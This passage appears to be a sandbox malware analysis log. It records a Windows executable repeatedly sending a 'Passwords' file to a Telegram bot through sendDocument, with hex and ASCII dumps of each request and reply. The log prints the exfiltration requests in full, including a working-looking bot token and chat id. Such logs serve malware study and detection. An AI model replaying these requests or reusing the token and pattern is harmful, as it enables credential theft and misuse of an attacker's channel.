                                                                                                            2025-01-10 20:49:56 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:49:55 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:49:56 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 31 39 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44710,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542195,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            10192.168.2.1049992149.154.167.2204433144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:49:57 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd32268ab0e2a6
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:49:57 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 32 36 38 61 62 30 65 32 61 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd32268ab0e2a6Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:49:57 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:49:57 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:49:57 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 31 39 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44711,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542197,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            11192.168.2.1049994149.154.167.2204433144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:49:58 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3239af1dc67c
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:49:58 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 33 39 61 66 31 64 63 36 37 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3239af1dc67cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:49:59 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:49:59 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:49:59 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 31 39 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44712,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542199,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            12192.168.2.1049996149.154.167.2204433144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:50:00 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd324cc6aab803
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:50:00 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 34 63 63 36 61 61 62 38 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd324cc6aab803Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:50:00 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:50:00 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:50:00 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 32 30 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44713,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542200,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            13192.168.2.1049999149.154.167.2204433144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:50:23 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3364fb822098
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:50:23 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 36 34 66 62 38 32 32 30 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3364fb822098Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:50:23 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:50:23 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:50:23 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 32 32 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44714,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542223,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            14192.168.2.1050001149.154.167.2204433144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:50:25 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd337dcb14f585
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:50:25 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 37 64 63 62 31 34 66 35 38 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd337dcb14f585Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:50:25 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:50:25 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 535
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:50:25 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 32 32 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44715,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542225,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            15192.168.2.1050003149.154.167.2204433144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:50:27 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd33953cf57d39
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:50:27 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 39 35 33 63 66 35 37 64 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd33953cf57d39Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:50:27 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:50:27 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:50:27 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 32 32 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44716,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542227,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            16192.168.2.1050005149.154.167.2204433144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:50:29 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd33bec03b8946
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:50:29 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 62 65 63 30 33 62 38 39 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd33bec03b8946Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:50:29 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:50:29 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
